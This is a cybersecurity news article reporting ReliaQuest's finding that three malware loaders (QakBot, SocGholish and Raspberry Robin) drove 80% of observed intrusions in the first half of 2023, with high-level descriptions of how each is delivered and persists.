Four in Five Cyber-Attacks Powered by Just Three Malware Loaders

Written by

Cybersecurity provider ReliaQuest observed that cyber-criminals used seven different malware loaders to deploy their intrusion campaigns in the first half of 2023.

Three of them, QakBot, SocGholish and Raspberry Robin, were the most popular loaders, accounting for 80% of all intrusions.

Top 7 most observed malware loaders, January 1-July 31, 2023, by percentage of all loaders observed. Source: ReliaQuest
Top 7 most observed malware loaders, January 1-July 31, 2023, by percentage of all loaders observed. Source: ReliaQuest

QakBot, BlackBasta’s Preferred Tool

The first, QakBot (aka QBot, QuackBot, Pinkslipbot), was used in 30% of intrusions observed by ReliaQuest.

Active since 2009, QakBot is linked to the BlackBasta ransomware group and is used to target any industry. It was initially a banking trojan but later evolved into a malware loader that can deploy additional payloads, steal sensitive information, and enable lateral movement.

It is typically deployed via a phishing email that offers the recipient tailored lures—work orders, urgent requests, invoices, file attachments, or hyperlinks. These lead to the download of payloads, (in the form of PDFs, HTML scripts, or OneNote files).

QakBot then uses WSF, JavaScript, Batch, HTA, or LNK files that, when executed, typically establish persistence via scheduled task or registry run keys.

Finally, QakBot performs discovery commands and begins command-and-control (C2) communication to relay system/domain information and drop additional payloads (commonly, the remote-access tools “Atera” or “NetSupport,” along with “Cobalt Strike”) for post-exploitation objectives.

QakBot was recently observed by HP Wolf in its Threat Insights Report as the most active ransomware family of the second quarter of 2023.

SocGholish, Evil Corp’s Loader Since 2018

The second one, SocGholish (aka FakeUpdates), was involved in 27% of intrusions.

Associated with Evil Corp, an allegedly Russia-based group waging financially motivated cybercrime since at least 2007, SocGholish started to be used in 2018 against organizations in the accommodation and food services industry, retail trade, and legal services, primarily in the US.

It is a JavaScript-based loader that targets Microsoft Windows-based environments.

The malware is delivered via drive-by compromise (downloaded without user interaction). Visitors to a wide network of compromised websites are tricked into downloading ‘updates,’ typically through outdated browser prompts or other update lures for Microsoft Teams and Adobe Flash.

SocGholish is also linked to Exotic Lily, an initial access broker (IAB) active since at least September 2021. The IAB conducts highly sophisticated phishing campaigns to gain initial access to organizations and sell it to other threat actors.

In the first half of 2023, SocGholish’s operators conducted aggressive watering hole attacks. They compromised and infected the websites of large organizations engaged in common business operations with lucrative potential. Unsuspecting visitors inevitably downloaded the SocGholish payload, leading to widespread infections.

Raspberry Robin, a Worm-Turned-Loader Used by Various Groups

The third one, Raspberry Robin, was deployed in 23% of intrusions.

This malware loader is tied to various malicious groups, such as Evil Corp and Silence (aka Whisper Spider), a financially motivated threat actor targeting financial institutions in Ukraine, Russia, Azerbaijan, Poland, and Kazakhstan.

It has also been used to deliver multiple ransomware and other malware variants, such as “Clop,” “LockBit,” “TrueBot,” and “Flawed Grace,” in addition to the Cobalt Strike tool.

Raspberry Robin is a highly elusive worm-turned-loader that targets Microsoft Windows environments. Its exceptional propagation capabilities kick in after initial infection via malicious USB devices, when cmd.exe runs and executes a LNK file on the infected USB.

Read more: New WikiLoader Malware Goes to Extreme Lengths to Hide

The LNK file contains commands triggering native Windows processes, such as msiexec.exe, to initiate an outbound connection to download the Raspberry Robin DLL.

Once the Raspberry Robin payload is running, additional processes are spawned using system binaries, such as rundll32.exe, odbcconf.exe, and control.exe, to run malicious code. This code injects itself into system processes (e.g., regsvr32.exe, rundll32.exe, dllhost.exe) to create scheduled tasks for persistence, to initiate C2 communication, and to deliver other payloads.

In 2023, Raspberry Robin has been used to target financial institutions, telecommunications, government, and manufacturing organizations, mainly in Europe, although the US has had its fair share of attacks.

SocGholish’s operators used Raspberry Robin in the first quarter of 2023 when heavily targeting legal and financial services organizations.

In its analysis, ReliaQuest warned that these findings focus on the malware loaders detected on their telemetry. Therefore, it doesn’t mean the targeted networks were necessarily compromised.

“In the majority of cases we observed, the malware loader was detected and stopped early in the kill chain. But it’s crucial to not look away from the car-crash threat of any loader, especially the three most popular,” the company said.

What’s hot on Infosecurity Magazine?